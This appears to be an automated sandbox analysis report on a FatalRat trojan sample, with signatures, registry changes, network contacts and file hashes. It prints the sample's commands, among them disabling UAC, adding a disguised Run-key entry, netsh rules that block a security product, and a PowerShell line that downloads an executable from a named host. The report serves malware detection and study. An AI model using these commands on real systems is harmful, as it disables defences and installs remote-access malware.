Analysis Overview
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Threat Level: Known bad
The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Fatalrat family
FatalRat
Fatal Rat payload
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
Adds Run key to start application
Checks installed software on the system
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-23 12:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-23 12:41
Reported
2025-02-23 12:44
Platform
win7-20240903-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024200\Agghosts.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024200\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024200\Agghosts.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024200\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "
C:\programdata\20250223024200\Agghosts.exe
"C:\programdata\20250223024200\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49245 | | tcp |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:80 | www.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabF124.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarF3E5.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2736-36-0x0000000003DE0000-0x00000000041F4000-memory.dmp
memory/2736-38-0x0000000001CE0000-0x0000000001CE1000-memory.dmp
memory/2736-37-0x0000000004200000-0x0000000004619000-memory.dmp
memory/2736-35-0x0000000004200000-0x0000000004619000-memory.dmp
memory/2736-39-0x0000000004200000-0x0000000004619000-memory.dmp
C:\Users\Public\Downloads\20250223024200\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\20250223024200\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\ProgramData\lnk\2.lnk
| MD5 | 33d26e34abac9364def07a7bc4c53043 |
| SHA1 | a2132a28c45de1a5410ea034fb841a962221c669 |
| SHA256 | 61419b248afc224acea8715cc94010539d847de72c1a2014a8312eb036115aa2 |
| SHA512 | 7fd13729ba06fba1febdefb24b3e2ad97681b897e68be0ccfebb9992f89a7a15734a355502e89687ea33fc4bf15648074942e21a43b8ed3acdf162159287bac6 |
C:\programdata\20250223024200\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\programdata\20250223024200\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Downloads\20250223024200\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp
memory/2736-94-0x0000000003DE0000-0x00000000041F4000-memory.dmp
memory/2736-93-0x0000000004200000-0x0000000004619000-memory.dmp
memory/1688-107-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/1688-106-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aea5c63f53c52acaf4ba4b9596cc834e |
| SHA1 | e3fc687954187fbc81bad8ee865ee9b39df8e1c7 |
| SHA256 | 28c518fd853b0a5e5d6f387fc63e1936c69a6029163a2f765ee71c4cace53ab0 |
| SHA512 | d3d6526182333f721a7efbcedcc8ff4bfa3d61b3f843d49b71cd74532b8fd3fe4751a8413be338ca07cc74a8059963401a26265df9546952f4f19f82ab448844 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-23 12:41
Reported
2025-02-23 12:44
Platform
win10v2004-20250217-en
Max time kernel
141s
Max time network
150s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Public\Videos\bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Videos\bin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024202\Agghosts.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\ = "URL:TonSite Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
